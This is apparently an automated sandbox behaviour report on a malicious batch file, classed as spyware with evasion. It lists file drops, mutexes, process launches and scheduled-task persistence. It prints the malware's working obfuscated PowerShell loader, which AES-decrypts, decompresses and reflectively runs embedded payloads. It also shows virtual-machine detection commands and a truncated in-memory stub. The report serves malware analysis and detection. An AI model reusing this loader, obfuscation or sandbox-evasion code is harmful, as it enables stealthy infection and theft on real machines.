Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.batJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\$rbx-onimai2\$rbx-CO2.bat\:Zone.Identifier:$DATAJump to behavior
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\System32\Tasks\$rbx-FHOIapsb
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_f4o4oimb.n1j.ps1
Source: C:\Windows\System32\cmd.exeCode function: 17_3_00000253FC3DCC9417_3_00000253FC3DCC94
Source: C:\Windows\System32\cmd.exeCode function: 17_3_00000253FC3DCE1817_3_00000253FC3DCE18
Source: C:\Windows\System32\cmd.exeCode function: 17_3_00000253FC3D23F017_3_00000253FC3D23F0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40D89417_2_00000253FC40D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC40DA1817_2_00000253FC40DA18
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC402FF017_2_00000253FC402FF0
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43D89417_2_00000253FC43D894
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC43DA1817_2_00000253FC43DA18
Source: C:\Windows\System32\cmd.exeCode function: 17_2_00000253FC432FF017_2_00000253FC432FF0
Source: C:\Windows\System32\conhost.exeCode function: 18_3_000002A5AF33CC9418_3_000002A5AF33CC94
Source: C:\Windows\System32\conhost.exeCode function: 18_3_000002A5AF3323F018_3_000002A5AF3323F0
Source: C:\Windows\System32\conhost.exeCode function: 18_3_000002A5AF33CE1818_3_000002A5AF33CE18
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36D89418_2_000002A5AF36D894
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF362FF018_2_000002A5AF362FF0
Source: C:\Windows\System32\conhost.exeCode function: 18_2_000002A5AF36DA1818_2_000002A5AF36DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EDD7836_2_00007FFD343EDD78
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E6CE536_2_00007FFD343E6CE5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E9DA836_2_00007FFD343E9DA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E25DD36_2_00007FFD343E25DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343EE34936_2_00007FFD343EE349
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E3AFB36_2_00007FFD343E3AFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E2EF236_2_00007FFD343E2EF2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E36F136_2_00007FFD343E36F1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD343E277536_2_00007FFD343E2775
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD34666B0D36_2_00007FFD34666B0D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD34666F0136_2_00007FFD34666F01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD34664FD136_2_00007FFD34664FD1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD3466544236_2_00007FFD34665442
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD3466000036_2_00007FFD34660000
Source: C:\Windows\System32\conhost.exeCode function: 37_3_000001780D3E23F037_3_000001780D3E23F0
Source: C:\Windows\System32\conhost.exeCode function: 37_3_000001780D3ECE1837_3_000001780D3ECE18
Source: C:\Windows\System32\conhost.exeCode function: 37_3_000001780D3ECC9437_3_000001780D3ECC94
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD22FF037_2_000001780DD22FF0
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2DA1837_2_000001780DD2DA18
Source: C:\Windows\System32\conhost.exeCode function: 37_2_000001780DD2D89437_2_000001780DD2D894
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000020175E8CE1838_3_0000020175E8CE18
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000020175E8CC9438_3_0000020175E8CC94
Source: C:\Windows\System32\dllhost.exeCode function: 38_3_0000020175E823F038_3_0000020175E823F0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140001CF038_2_0000000140001CF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002D4C38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000320438_2_0000000140003204
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000243438_2_0000000140002434
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000127438_2_0000000140001274
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBDA1838_2_0000020175EBDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EBD89438_2_0000020175EBD894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EB2FF038_2_0000020175EB2FF0
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EEDA1838_2_0000020175EEDA18
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EED89438_2_0000020175EED894
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000020175EE2FF038_2_0000020175EE2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_000002D0165823F039_3_000002D0165823F0
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_000002D01658CC9439_3_000002D01658CC94
Source: C:\Windows\System32\winlogon.exeCode function: 39_3_000002D01658CE1839_3_000002D01658CE18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165E2FF039_2_000002D0165E2FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165ED89439_2_000002D0165ED894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D0165EDA1839_2_000002D0165EDA18
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D016612FF039_2_000002D016612FF0
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661D89439_2_000002D01661D894
Source: C:\Windows\System32\winlogon.exeCode function: 39_2_000002D01661DA1839_2_000002D01661DA18
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2683
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682
Source: unknownProcess created: Commandline size = 5477
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2683Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 2682Jump to behavior
Source: Process Memory Space: powershell.exe PID: 6444, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7088, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\dllhost.exeQC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}(
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.drBinary string: >\Device\HarddiskVolume3\Windows\System32\drivers\filetrace.sys
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: \Device\NetbiosSmb
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 9\Device\HarddiskVolume3\Windows\System32\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: System.evtx.49.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4lt
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.drBinary string: J\Device\HarddiskVolume3\Program Files (x86)\Joebox\driver\joeboxdriver.sys
Source: System.evtx.49.drBinary string: \Device\HarddiskVolume3\Windows\SysWOW64\tzutil.exeh
Source: System.evtx.49.drBinary string: C:\Device\HarddiskVolume3`&
Source: System.evtx.49.drBinary string: C:\Device\HarddiskVolume3
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exeP**
Source: Microsoft-Windows-CodeIntegrity%4Operational.evtx.49.drBinary string: N\Device\HarddiskVolume3\Users\user\AppData\Local\Temp\JSAMSIProvider64.dll6\Device\HarddiskVolume3\Windows\System32\SIHClient.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 1\Device\HarddiskVolume3\Windows\SysWOW64\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-Security-Mitigations%4KernelMode.evtx.49.drBinary string: 4\Device\HarddiskVolume3\Windows\System32\spoolsv.exe
Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.49.drBinary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.drBinary string: \Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe8
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: user-PC WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: System.evtx.49.drBinary string: \\?\Volume{5d0fa9fb-e2e8-4263-a849-b22baad6d1d8}\Device\HarddiskVolume4A
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.49.drBinary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-SMBServer%4Operational.evtx.49.drBinary string: DESKTOP-AGET0TR WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: classification engineClassification label: mal100.spyw.evad.winBAT@56/86@2/2
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_0000000140002D4C OpenMutexW,Sleep,CloseHandle,GetCurrentProcessId,OpenProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,RegQueryValueExW,RegQueryValueExW,RegCloseKey,GetCurrentProcessId,RegCreateKeyExW,ConvertStringSecurityDescriptorToSecurityDescriptorW,RegSetKeySecurity,LocalFree,RegCreateKeyExW,GetCurrentProcessId,RegSetValueExW,RegCloseKey,RegCloseKey,CreateThread,GetProcessHeap,HeapAlloc,CreateThread,CreateThread,ShellExecuteW,GetProcessHeap,HeapFree,SleepEx,38_2_0000000140002D4C
Source: C:\Windows\System32\dllhost.exeCode function: 38_2_000000014000217C SysAllocString,SysAllocString,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,VariantInit,CoUninitialize,SysFreeString,SysFreeString,38_2_000000014000217C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\3259231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Local\ee0b84a4-b7e5-4383-b65b-82bf094fa75b
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7088
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6248:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\4569933
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5552:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\2180219
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6444
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qbml4rjv.f1d.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6444 -s 2396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2212
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7088 -s 2104
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:thuUFdhjXkHq{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$yFLwIFejWheBPy,[Parameter(Position=1)][Type]$NxINIPbKxv)$yMLVqpDcpHk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+'l'+''+[Char](101)+'ct'+[Char](101)+'d'+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+','+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+[Char](44)+'A'+[Char](110)+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](65)+''+[Char](117)+'t'+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$yMLVqpDcpHk.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+''+'c'+''+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,'+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'S'+[Char](105)+''+'g'+''+','+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'me,M'+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+'d');$yMLVqpDcpHk.DefineMethod(''+'I'+''+'n'+'v'+[Char](111)+'k'+[Char](101)+'',''+'P'+''+'u'+''+'b'+'li'+'c'+''+','+''+'H'+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+'e'+''+'w'+''+[Char](83)+''+'l'+'o'+[Char](116)+','+'V'+''+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$NxINIPbKxv,$yFLwIFejWheBPy).SetImplementationFlags(''+[Char](82)+'unt'